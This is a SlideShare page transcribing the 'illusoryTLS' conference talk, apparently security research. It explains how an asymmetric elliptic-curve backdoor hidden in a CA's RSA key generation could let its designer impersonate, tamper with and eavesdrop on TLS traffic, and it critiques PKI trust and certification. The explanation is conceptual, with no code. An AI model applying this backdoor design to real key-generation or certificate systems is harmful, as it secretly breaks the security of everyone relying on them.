. Let G be the base point of the curve
. Given three point elements (xG), (yG) and (zG)
. Decide whether (zG = xyG), or not
. Where (x, y, z) are chosen randomly and 1 < x, y, z < n
1 of 173

Recommended

illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit (DeepSEC 2015) by
illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit (DeepSEC 2015)illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit (DeepSEC 2015)
illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit (DeepSEC 2015)a001
967 views173 slides
illusoryTLS: Impersonate, Tamper, and Exploit by
illusoryTLS: Impersonate, Tamper, and ExploitillusoryTLS: Impersonate, Tamper, and Exploit
illusoryTLS: Impersonate, Tamper, and Exploita001
423 views174 slides
Selective Opening Secure Functional Encryption by
Selective Opening Secure Functional Encryption Selective Opening Secure Functional Encryption
Selective Opening Secure Functional Encryption csandit
249 views16 slides
Encryption by
EncryptionEncryption
Encryptionvasanthimuniasamy
5.2K views16 slides
Detection of Various Attacks Using Zero Knowledge Protocol in Wireless Security by
Detection of Various Attacks Using Zero Knowledge Protocol in Wireless SecurityDetection of Various Attacks Using Zero Knowledge Protocol in Wireless Security
Detection of Various Attacks Using Zero Knowledge Protocol in Wireless Securityijceronline
26 views3 slides
Computer Security (Cryptography) Ch01 by
Computer Security (Cryptography) Ch01Computer Security (Cryptography) Ch01
Computer Security (Cryptography) Ch01Saif Kassim
493 views13 slides

More Related Content

What's hot

勒索軟體態勢與應措 by
勒索軟體態勢與應措勒索軟體態勢與應措
勒索軟體態勢與應措jack51706
671 views33 slides
Network Security by
Network SecurityNetwork Security
Network SecurityRamasubbu .P
2.3K views82 slides
Cryptography and E-Commerce by
Cryptography and E-CommerceCryptography and E-Commerce
Cryptography and E-CommerceHiep Luong
24.7K views40 slides
Hacking Presentation by
Hacking PresentationHacking Presentation
Hacking PresentationAnimesh Behera
79 views30 slides
Detection of Various Attacks using Zero Knowledge Protocol in Wireless Security by
Detection of Various Attacks using Zero Knowledge Protocol in Wireless SecurityDetection of Various Attacks using Zero Knowledge Protocol in Wireless Security
Detection of Various Attacks using Zero Knowledge Protocol in Wireless Securityijceronline
16 views2 slides
My cryptography by
My cryptographyMy cryptography
My cryptographyNAVYA RAO
332 views26 slides

What's hot(13)

勒索軟體態勢與應措 by jack51706
勒索軟體態勢與應措勒索軟體態勢與應措
勒索軟體態勢與應措
jack51706671 views
Cryptography and E-Commerce by Hiep Luong
Cryptography and E-CommerceCryptography and E-Commerce
Cryptography and E-Commerce
Hiep Luong24.7K views
Detection of Various Attacks using Zero Knowledge Protocol in Wireless Security by ijceronline
Detection of Various Attacks using Zero Knowledge Protocol in Wireless SecurityDetection of Various Attacks using Zero Knowledge Protocol in Wireless Security
Detection of Various Attacks using Zero Knowledge Protocol in Wireless Security
ijceronline16 views
My cryptography by NAVYA RAO
My cryptographyMy cryptography
My cryptography
NAVYA RAO332 views
Rothke Info Security Canada 2007 Final by Ben Rothke
Rothke   Info Security Canada 2007 FinalRothke   Info Security Canada 2007 Final
Rothke Info Security Canada 2007 Final
Ben Rothke1.1K views
Paper id 311201535 by IJRAT
Paper id 311201535Paper id 311201535
Paper id 311201535
IJRAT124 views
Presentation on Cryptography by Karan Jaiswal
Presentation on CryptographyPresentation on Cryptography
Presentation on Cryptography
Karan Jaiswal70 views
Cryptographic Algorithms For Secure Data Communication by CSCJournals
Cryptographic Algorithms For Secure Data CommunicationCryptographic Algorithms For Secure Data Communication
Cryptographic Algorithms For Secure Data Communication
CSCJournals258 views

Similar to illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit

POST-QUANTUM CRYPTOGRAPHY by
POST-QUANTUM CRYPTOGRAPHYPOST-QUANTUM CRYPTOGRAPHY
POST-QUANTUM CRYPTOGRAPHYPavithra Muthu
126 views8 slides
Security Enhancements Ieee 802.11 Wireless Lans Through... by
Security Enhancements Ieee 802.11 Wireless Lans Through...Security Enhancements Ieee 802.11 Wireless Lans Through...
Security Enhancements Ieee 802.11 Wireless Lans Through...Kristi Anderson
3 views81 slides
How to hide your browser 0-days by
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
2.3K views49 slides
Hacking and its types by
Hacking and its typesHacking and its types
Hacking and its typesRishab Gupta
675 views38 slides
Zero-knowledge proofs and why it is future of blockchain.pdf by
Zero-knowledge proofs and why it is future of blockchain.pdfZero-knowledge proofs and why it is future of blockchain.pdf
Zero-knowledge proofs and why it is future of blockchain.pdfKonrad Kokosa
40 views44 slides
Network Security by
Network SecurityNetwork Security
Network SecurityPuneet Abichandani
875 views30 slides

Similar to illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit(20)

Security Enhancements Ieee 802.11 Wireless Lans Through... by Kristi Anderson
Security Enhancements Ieee 802.11 Wireless Lans Through...Security Enhancements Ieee 802.11 Wireless Lans Through...
Security Enhancements Ieee 802.11 Wireless Lans Through...
Kristi Anderson3 views
How to hide your browser 0-days by Zoltan Balazs
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
Zoltan Balazs2.3K views
Hacking and its types by Rishab Gupta
Hacking and its typesHacking and its types
Hacking and its types
Rishab Gupta675 views
Zero-knowledge proofs and why it is future of blockchain.pdf by Konrad Kokosa
Zero-knowledge proofs and why it is future of blockchain.pdfZero-knowledge proofs and why it is future of blockchain.pdf
Zero-knowledge proofs and why it is future of blockchain.pdf
Konrad Kokosa40 views
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows by Aaron ND Sawmadal
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Aaron ND Sawmadal247 views
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows by Aaron ND Sawmadal
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Aaron ND Sawmadal624 views
Security Versus Privacy Essay by Mary Brown
Security Versus Privacy EssaySecurity Versus Privacy Essay
Security Versus Privacy Essay
Mary Brown2 views
How to hide your browser 0-day @ Disobey by Zoltan Balazs
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
Zoltan Balazs465 views
Verification of Security for Untrusted Third Party IP Cores by IRJET Journal
Verification of  Security for Untrusted Third Party IP CoresVerification of  Security for Untrusted Third Party IP Cores
Verification of Security for Untrusted Third Party IP Cores
IRJET Journal33 views
Surreptitiously weakening cryptographic systems by Yael Ziv
Surreptitiously weakening cryptographic systemsSurreptitiously weakening cryptographic systems
Surreptitiously weakening cryptographic systems
Yael Ziv449 views
An overview of unix rootkits by UltraUploader
An overview of unix rootkitsAn overview of unix rootkits
An overview of unix rootkits
UltraUploader446 views
Selective Encryption Algorithm For Highly Confidential... by Trish Shea
Selective Encryption Algorithm For Highly Confidential...Selective Encryption Algorithm For Highly Confidential...
Selective Encryption Algorithm For Highly Confidential...
Trish Shea3 views
Privacy, Crime, And Prevention by Nicole Wells
Privacy, Crime, And PreventionPrivacy, Crime, And Prevention
Privacy, Crime, And Prevention
Nicole Wells3 views
Advantages Of Secure Socket Layer by Sandra Gubner
Advantages Of Secure Socket LayerAdvantages Of Secure Socket Layer
Advantages Of Secure Socket Layer
Sandra Gubner2 views
Protecting Data Through Encryption Essay by Dawn Mora
Protecting Data Through Encryption EssayProtecting Data Through Encryption Essay
Protecting Data Through Encryption Essay
Dawn Mora6 views

More from a001

Deliberately Un-Dependable Applications: the Role of Dependability Metrics in... by
Deliberately Un-Dependable Applications: the Role of Dependability Metrics in...Deliberately Un-Dependable Applications: the Role of Dependability Metrics in...
Deliberately Un-Dependable Applications: the Role of Dependability Metrics in...a001
206 views48 slides
The Vulnerability Supply Chain - HackIT Ukraine 2016, Kharkiv by
The Vulnerability Supply Chain - HackIT Ukraine 2016, KharkivThe Vulnerability Supply Chain - HackIT Ukraine 2016, Kharkiv
The Vulnerability Supply Chain - HackIT Ukraine 2016, Kharkiva001
163 views143 slides
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion... by
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...a001
233 views170 slides
Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a... by
Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a...Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a...
Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a...a001
72 views114 slides
Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for... by
Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for...Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for...
Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for...a001
264 views123 slides
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion... by
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...a001
537 views171 slides

More from a001(9)

Deliberately Un-Dependable Applications: the Role of Dependability Metrics in... by a001
Deliberately Un-Dependable Applications: the Role of Dependability Metrics in...Deliberately Un-Dependable Applications: the Role of Dependability Metrics in...
Deliberately Un-Dependable Applications: the Role of Dependability Metrics in...
a001206 views
The Vulnerability Supply Chain - HackIT Ukraine 2016, Kharkiv by a001
The Vulnerability Supply Chain - HackIT Ukraine 2016, KharkivThe Vulnerability Supply Chain - HackIT Ukraine 2016, Kharkiv
The Vulnerability Supply Chain - HackIT Ukraine 2016, Kharkiv
a001163 views
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion... by a001
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...
a001233 views
Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a... by a001
Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a...Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a...
Andy, the Polluters, Rick Deckard, and Other Bounty Hunters
Vulnerabilities a...
a00172 views
Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for... by a001
Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for...Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for...
Vulnerabilities and their Surrounding Ethical Questions: A Code of Ethics for...
a001264 views
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion... by a001
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...
The Bazaar, the Maharaja’s Ultimatum, and the Shadow of the Future: Extortion...
a001537 views
Auscert20150daymarket by a001
Auscert20150daymarketAuscert20150daymarket
Auscert20150daymarket
a001227 views
The Bazaar, the Maharaja's Ultimatum, and the Shadow of the Future: Extortion... by a001
The Bazaar, the Maharaja's Ultimatum, and the Shadow of the Future: Extortion...The Bazaar, the Maharaja's Ultimatum, and the Shadow of the Future: Extortion...
The Bazaar, the Maharaja's Ultimatum, and the Shadow of the Future: Extortion...
a001350 views
Cryptographic Key Reliable Lifetimes - Bounding the Risk of Key Exposure in t... by a001
Cryptographic Key Reliable Lifetimes - Bounding the Risk of Key Exposure in t...Cryptographic Key Reliable Lifetimes - Bounding the Risk of Key Exposure in t...
Cryptographic Key Reliable Lifetimes - Bounding the Risk of Key Exposure in t...
a001419 views

Recently uploaded

Dapr Unleashed: Accelerating Microservice Development by
Dapr Unleashed: Accelerating Microservice DevelopmentDapr Unleashed: Accelerating Microservice Development
Dapr Unleashed: Accelerating Microservice DevelopmentMiroslav Janeski
13 views29 slides
Programming Field by
Programming FieldProgramming Field
Programming Fieldthehardtechnology
6 views9 slides
Quality Assurance by
Quality Assurance Quality Assurance
Quality Assurance interworksoftware2
5 views6 slides
Bootstrapping vs Venture Capital.pptx by
Bootstrapping vs Venture Capital.pptxBootstrapping vs Venture Capital.pptx
Bootstrapping vs Venture Capital.pptxZeljko Svedic
15 views17 slides
EV Charging App Case by
EV Charging App Case EV Charging App Case
EV Charging App Case iCoderz Solutions
9 views1 slide
Flask-Python.pptx by
Flask-Python.pptxFlask-Python.pptx
Flask-Python.pptxTriloki Gupta
9 views12 slides

Recently uploaded(20)

Dapr Unleashed: Accelerating Microservice Development by Miroslav Janeski
Dapr Unleashed: Accelerating Microservice DevelopmentDapr Unleashed: Accelerating Microservice Development
Dapr Unleashed: Accelerating Microservice Development
Miroslav Janeski13 views
Bootstrapping vs Venture Capital.pptx by Zeljko Svedic
Bootstrapping vs Venture Capital.pptxBootstrapping vs Venture Capital.pptx
Bootstrapping vs Venture Capital.pptx
Zeljko Svedic15 views
AI and Ml presentation .pptx by FayazAli87
AI and Ml presentation .pptxAI and Ml presentation .pptx
AI and Ml presentation .pptx
FayazAli8714 views
ADDO_2022_CICID_Tom_Halpin.pdf by TomHalpin9
ADDO_2022_CICID_Tom_Halpin.pdfADDO_2022_CICID_Tom_Halpin.pdf
ADDO_2022_CICID_Tom_Halpin.pdf
TomHalpin95 views
Introduction to Git Source Control by John Valentino
Introduction to Git Source ControlIntroduction to Git Source Control
Introduction to Git Source Control
John Valentino7 views
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx by animuscrm
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx
2023-November-Schneider Electric-Meetup-BCN Admin Group.pptx
animuscrm15 views
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium... by Lisi Hocke
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...
Team Transformation Tactics for Holistic Testing and Quality (Japan Symposium...
Lisi Hocke35 views
FIMA 2023 Neo4j & FS - Entity Resolution.pptx by Neo4j
FIMA 2023 Neo4j & FS - Entity Resolution.pptxFIMA 2023 Neo4j & FS - Entity Resolution.pptx
FIMA 2023 Neo4j & FS - Entity Resolution.pptx
Neo4j17 views
Airline Booking Software by SharmiMehta
Airline Booking SoftwareAirline Booking Software
Airline Booking Software
SharmiMehta9 views

illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit

  • 1. ... Nobody But Us Impersonate, Tamper, and Exploit .. Alfonso De Gregorio . Founder, BeeWise .. ZeroNights 2015, Moscow, November 25th-26th, 2015 ..
  • 2. .... Web PKI is Fragile . 1/103 WebPKIisFragile
  • 3. ..
  • 4. ..
  • 5. ..
  • 6. ..
  • 7. ... Discuss . Web PKI is Fragile . 6/103 /me @secYOUre #illusoryTLS #ZeroNights
  • 8. ... First times are... . Web PKI is Fragile . 7/103 ..
  • 9. .... Web PKI is Fragile . 8/103 If only we could notice them
  • 10. ... Web PKI is Fragile . Web PKI is Fragile . 9/103 ... Web PKI is Fragile
  • 11. ... PKI Dramas . Web PKI is Fragile . 10/103 . China Internet Network Information Center (CNNIC), 2015 . Lenovo, 2015 . National Informatics Centre of India, 2014 . ANSSI, 2013 . Trustwave, 2012 . Türktrust, 2011-2013 . DigiNotar, 2011 . Comodo, 2011 . Verisign, 2010
  • 12. ... Unsuspecting Users . Web PKI is Fragile . 11/103 ..
  • 13. ... Remaining oblivious . Web PKI is Fragile . 12/103 ..
  • 14. ... Silent Failure . Web PKI is Fragile . 13/103 ..
  • 15. ..
  • 16. ... /me . Web PKI is Fragile . 15/103 At the intersection of so ware security and security so ware, exploring, and trying to contain, the space of unanticipated state.
  • 17. ... Secure Backdoor . Web PKI is Fragile . 16/103 Almost safe
  • 18. ... Agenda . Web PKI is Fragile . 17/103 1. Web PKI is Fragile The sorrow state of the infrastructure we daily entrust our business upon 2. illusoryTLS Nobody But Us Impersonate, Tamper, and Exploit 3. The Impact Or, why one rotten apple spoils the whole barrel 4. A Backdoor Embedding Algorithm Elligator turned to evil 5. Conclusions The misery of our times
  • 19. ... Perspective . Web PKI is Fragile . 18/103 . Timely topic o en debated as matter for a government to legislate on
  • 20. ... Perspective . Web PKI is Fragile . 18/103 . Timely topic o en debated as matter for a government to legislate on . A space that some entities might have practically explored regardless of the policy framework
  • 21. ... Perspective . Web PKI is Fragile . 18/103 . Timely topic o en debated as matter for a government to legislate on . A space that some entities might have practically explored regardless of the policy framework . Would we be able to notice if our communications were being exploited?
  • 22. ... Poll . Web PKI is Fragile . 19/103 ... Poll
  • 23. ... Poll . Web PKI is Fragile . 20/103 How many of you think that backdoors can be asymmetric?
  • 24. ... Poll . Web PKI is Fragile . 21/103 How many of you think that backdoors can be planted in data?
  • 25. ... Common View . Web PKI is Fragile . 22/103 . Backdoors are symmetric . Malicious logic in the target system code base . Everyone with knowledge about the internals of the backdoor can exploit it . Given enough skills and effort, code review can spot their presence
  • 26. ... Yet . Web PKI is Fragile . 23/103 . Backdoors can be asymmetric. Their complete code does not enable anyone, except those with access to the key-recovery system, to exploit the backdoor
  • 27. ... Yet . Web PKI is Fragile . 23/103 . Backdoors can be asymmetric. Their complete code does not enable anyone, except those with access to the key-recovery system, to exploit the backdoor . Backdoors can be planted in data
  • 28. .... Web PKI is Fragile . 24/103 Backdoor is data, data is backdoor
  • 29. .... Web PKI is Fragile . 25/103 .. “ The illusion that your program is manipulating its data is powerful. But it is an illusion: The data is controlling your program. Taylor Hornby.. ”
  • 30. ... Scenario . Web PKI is Fragile . 26/103 . The entire X.509 Web PKI security architecture falls apart, if a single CA certificate with a secretly embedded backdoor enters the certificate store of relying parties
  • 31. ... Scenario . Web PKI is Fragile . 26/103 . . The entire X.509 Web PKI security architecture falls apart, if a single CA certificate with a secretly embedded backdoor enters the certificate store of relying parties Have we sufficient assurance that this did not happen already?
  • 33. ... Underhanded Crypto Contest . illusoryTLS . 28/103 . .. .. “ The Underhanded Crypto Contest is a competition to write or modify crypto code that appears to be secure, but actually does something evil .. ”
  • 34. ... illusoryTLS . illusoryTLS . 29/103 . An instance of the Young and Yung elliptic curve asymmetric backdoor in RSA key generation
  • 35. ... Security Outcome . illusoryTLS . 30/103 The backdoor completely perverts the security guarantees provided by the TLS protocol, allowing the attacker to: . Impersonate the endpoints (i.e., authentication failure)
  • 36. ... Security Outcome . illusoryTLS . 30/103 The backdoor completely perverts the security guarantees provided by the TLS protocol, allowing the attacker to: . Impersonate the endpoints (i.e., authentication failure) . Tamper with their messages (i.e., integrity erosion)
  • 37. ... Security Outcome . illusoryTLS . 30/103 The backdoor completely perverts the security guarantees provided by the TLS protocol, allowing the attacker to: . Impersonate the endpoints (i.e., authentication failure) . Tamper with their messages (i.e., integrity erosion) . Actively eavesdrop their communications (i.e., confidentiality loss)
  • 38. ... Threat Model . illusoryTLS . 31/103 The backdoor designer can: . “Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.”
  • 39. ... Threat Model . illusoryTLS . 31/103 The backdoor designer can: . “Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.” . “influence policies, standard and specifications for commercial public key technologies.”
  • 40. ... Threat Model . illusoryTLS . 31/103 The backdoor designer can: . “Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.” . “influence policies, standard and specifications for commercial public key technologies.” . Interfere with the supply-chain
  • 41. ... Threat Model . illusoryTLS . 31/103 The backdoor designer can: . “Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.” . “influence policies, standard and specifications for commercial public key technologies.” . Interfere with the supply-chain . Disregard everything about policy
  • 42. ... Threat Model . illusoryTLS . 31/103 The backdoor designer can: . “Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.” . “influence policies, standard and specifications for commercial public key technologies.” . Interfere with the supply-chain . Disregard everything about policy . Or, she is simply in the position to build the security module used by the Certification Authority for generating the key material
  • 45. ... Echo service over TLS . illusoryTLS . 34/103 ..
  • 46. ... Where is the backdoor? . illusoryTLS . 35/103 If the client and server code is contributed by an open-source project and it is used as-is, where is the backdoor?
  • 47. ... Where is the backdoor? . illusoryTLS . 36/103 ..
  • 48. ... A Covert Channel . illusoryTLS . 37/103 . The upper order bits of the RSA modulus encode the asymmetric encryption of a seed generated at random
  • 49. ... A Covert Channel . illusoryTLS . 37/103 . The upper order bits of the RSA modulus encode the asymmetric encryption of a seed generated at random . The same seed was used to generate one of the RSA primes of the CA public-key modulus
  • 50. ... A Covert Channel . illusoryTLS . 37/103 . The upper order bits of the RSA modulus encode the asymmetric encryption of a seed generated at random . The same seed was used to generate one of the RSA primes of the CA public-key modulus . The RSA modulus is at the same time a RSA public-key and an ciphertext that gives to the backdoor designer the ability to factor with ease the modulus
  • 51. ... Where the backdoor is not . illusoryTLS . 38/103 No backdoor was slipped into the cryptographic credentials issued to the communicating endpoints
  • 52. ... SETUP Attacks . illusoryTLS . 39/103 .. . Notion introduced by Adam Young and Moti Yung at Crypto ’96 . Young and Yung elliptic-curve asymmetric backdoor in RSA key generation . Expands on ‘A Space Efficient Backdoor in RSA and its Applications’, Selected Areas in Cryptography ’05 . A working implementation at http://cryptovirology.com
  • 53. ... NOBUS . illusoryTLS . 40/103 .. . The exploitation requires access to resources not embedded in the backdoor itself . e.g., elliptic-curve private key . The vulnerability can be exploited by the backdoor designer and by whoever gains access to the associated key-recovery system
  • 54. .... illusoryTLS . 41/103 How many of you believe that it is possible to forbid an enemy intelligence organization from gaining access to a private key?
  • 55. ... Indistinguishability . illusoryTLS . 42/103 .. . Assuming ECDDH holds . The backdoor key pairs appear to all probabilistic polynomial time algorithms like genuine RSA key pairs . Black-box access to the key-generator does not allow detection
  • 56. ... Forward Secrecy . illusoryTLS . 43/103 .. . If a reverse-engineer breaches the key-generator, then the previously stolen information remains confidential
  • 57. ... Reusability . illusoryTLS . 44/103 .. . The backdoor can be used multiple times and against multiple targets
  • 59. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will
  • 60. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will . Impersonation (e.g., authentication failure)
  • 61. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will . Impersonation (e.g., authentication failure) . Message tampering (e.g., integrity erosion)
  • 62. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will . Impersonation (e.g., authentication failure) . Message tampering (e.g., integrity erosion) . Active eavesdropping of encrypted communications (e.g., confidentiality loss)
  • 63. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will . Impersonation (e.g., authentication failure) . Message tampering (e.g., integrity erosion) . Active eavesdropping of encrypted communications (e.g., confidentiality loss) . No need to have access to any private key used by system actors
  • 64. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will . Impersonation (e.g., authentication failure) . Message tampering (e.g., integrity erosion) . Active eavesdropping of encrypted communications (e.g., confidentiality loss) . No need to have access to any private key used by system actors . No need to tamper with the communicating endpoints
  • 65. ... A Subtle Attack . Impact . 46/103 .. . Break TLS security guarantees at will . Impersonation (e.g., authentication failure) . Message tampering (e.g., integrity erosion) . Active eavesdropping of encrypted communications (e.g., confidentiality loss) . No need to have access to any private key used by system actors . No need to tamper with the communicating endpoints . Need to retain control over the key-generation of the target RSA modulus
  • 66. .... Impact . 47/103 Is the malicious implementer a threat mitigated by IT product security certifications?
  • 67. ... Fictional Security . Impact . 48/103 ... A single CA certificate with a secretly embedded backdoor renders the entire TLS security fictional
  • 69. ... ... spoils the whole barrel . Impact . 50/103 ... ... spoils the whole barrel
  • 74. ... Cross Certification . Impact . 55/103 .. . Cross certification enables entities in one public key infrastructure to trust entities in another PKI
  • 75. ... Cross Certification . Impact . 55/103 .. . Cross certification enables entities in one public key infrastructure to trust entities in another PKI . This mutual trust relationship should be typically supported by a cross-certification agreement between the CAs in each PKI
  • 76. ... Cross Certification . Impact . 55/103 .. . Cross certification enables entities in one public key infrastructure to trust entities in another PKI . This mutual trust relationship should be typically supported by a cross-certification agreement between the CAs in each PKI . The agreement establishes the responsabilities and liability of each party
  • 77. ... Explicit Cross Certification . Impact . 56/103 .. . Each CA is required to issue a certificate to the other to establish a relationship in both directions
  • 78. ... Explicit Cross Certification . Impact . 56/103 .. . Each CA is required to issue a certificate to the other to establish a relationship in both directions . The path of trust is not hierarchical, although the separate PKIs may be certificate hierarchies
  • 79. ... Explicit Cross Certification . Impact . 56/103 .. . Each CA is required to issue a certificate to the other to establish a relationship in both directions . The path of trust is not hierarchical, although the separate PKIs may be certificate hierarchies . A er two CAs have established and specified the terms of trust and issued the certificates to each other, entities within the separate PKIs can interact subject to the policies specified in the certificates
  • 80. ... But this is just in theory...
  • 82. ... Implicit Cross Certification . Impact . 59/103 .. . Most current PKI so ware employs a form of implicit cross certification in which all root CAs are equally trusted
  • 83. ... Implicit Cross Certification . Impact . 59/103 .. . Most current PKI so ware employs a form of implicit cross certification in which all root CAs are equally trusted . Equivalent to unbounded cross certification among all CAs
  • 84. ... Implicit Cross Certification . Impact . 59/103 .. . Most current PKI so ware employs a form of implicit cross certification in which all root CAs are equally trusted . Equivalent to unbounded cross certification among all CAs . Any certificate can be trivially replaced by a masquereder’s certificate from another CA
  • 85. ... Implicit Cross Certification . Impact . 59/103 .. . Most current PKI so ware employs a form of implicit cross certification in which all root CAs are equally trusted . Equivalent to unbounded cross certification among all CAs . Any certificate can be trivially replaced by a masquereder’s certificate from another CA . The security of any certificate is reduced to that of the least trustworthy CA, who can issue bogus certificate to usurp the legitimate one, at the same level of trust
  • 86. ... CA Certificate in a MitM Proxy . Impact . 60/103 ..
  • 88. ... PKI is Not Dead, Just Resting . Impact . 62/103 ..
  • 93. ... As weak as the weakest link
  • 95. ..
  • 96. ..
  • 97. ..
  • 98. ... Negating any meaningful security whatsoever
  • 99. .... Impact . 73/103 It is essential to have assurance about the security of each implementation of vulnerable key-generation algorithm employed by trusted credential issuers
  • 101. .... Impact . 75/103 Have we sufficient assurance about the hundreds CA certificates we daily entrust our business upon?
  • 102. ... Requirements . Impact . 76/103 .. . Publicly trusted certificates to be issued in compliance with European Standard EN 319 411-3
  • 103. ... Requirements . Impact . 76/103 .. . Publicly trusted certificates to be issued in compliance with European Standard EN 319 411-3 . CA key generation to be carried out within a device that meets the requirements identified by some approved PP
  • 104. ... Requirements . Impact . 76/103 .. . Publicly trusted certificates to be issued in compliance with European Standard EN 319 411-3 . CA key generation to be carried out within a device that meets the requirements identified by some approved PP . CEN Workshop Agreement 14167, Part 2-3-4 are three of those PP
  • 105. ... Requirements . Impact . 76/103 .. . Publicly trusted certificates to be issued in compliance with European Standard EN 319 411-3 . CA key generation to be carried out within a device that meets the requirements identified by some approved PP . CEN Workshop Agreement 14167, Part 2-3-4 are three of those PP . EAL4 Augmented
  • 106. ... Requirements . Impact . 76/103 .. . Publicly trusted certificates to be issued in compliance with European Standard EN 319 411-3 . CA key generation to be carried out within a device that meets the requirements identified by some approved PP . CEN Workshop Agreement 14167, Part 2-3-4 are three of those PP . EAL4 Augmented . Augmentation from adherence to ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4
  • 107. ... ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4 . Impact . 77/103 .. . Focused on assessing the vulnerabilities in the TOE
  • 108. ... ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4 . Impact . 77/103 .. . Focused on assessing the vulnerabilities in the TOE . Guaranteeing that the implementation representation is an accurate and complete instantiation of the TSF requirements
  • 109. ... ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4 . Impact . 77/103 .. . Focused on assessing the vulnerabilities in the TOE . Guaranteeing that the implementation representation is an accurate and complete instantiation of the TSF requirements . Special emphasis on identifying covert channels and estimating their capacity
  • 110. ... ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4 . Impact . 77/103 .. . Focused on assessing the vulnerabilities in the TOE . Guaranteeing that the implementation representation is an accurate and complete instantiation of the TSF requirements . Special emphasis on identifying covert channels and estimating their capacity . SETUP attacks makes use of the key-generation as a covert channel for itself
  • 111. ... Yet . Impact . 78/103 .. . Developer is in charge for the vulnerability assessment and documentation
  • 112. ... Yet . Impact . 78/103 .. . Developer is in charge for the vulnerability assessment and documentation . Conflicts with our threat model
  • 113. ... Yet . Impact . 78/103 .. . Developer is in charge for the vulnerability assessment and documentation . Conflicts with our threat model . The evaluator is le with the documentation and the implementation representation to be assessed
  • 114. ... Yet . Impact . 78/103 .. . Developer is in charge for the vulnerability assessment and documentation . Conflicts with our threat model . The evaluator is le with the documentation and the implementation representation to be assessed . Can the presence of backdoor can be ruled out at the required assurance level?
  • 115. ... Yet . Impact . 78/103 .. . Developer is in charge for the vulnerability assessment and documentation . Conflicts with our threat model . The evaluator is le with the documentation and the implementation representation to be assessed . Can the presence of backdoor can be ruled out at the required assurance level? . Formal methods required only at the two highest levels (EAL6 and EAL7)
  • 116. ... Yet . Impact . 78/103 .. . Developer is in charge for the vulnerability assessment and documentation . Conflicts with our threat model . The evaluator is le with the documentation and the implementation representation to be assessed . Can the presence of backdoor can be ruled out at the required assurance level? . Formal methods required only at the two highest levels (EAL6 and EAL7) . Implementation representation may render backdoor detection unlikely (e.g., HDL at design time, netlist at fabrication time)
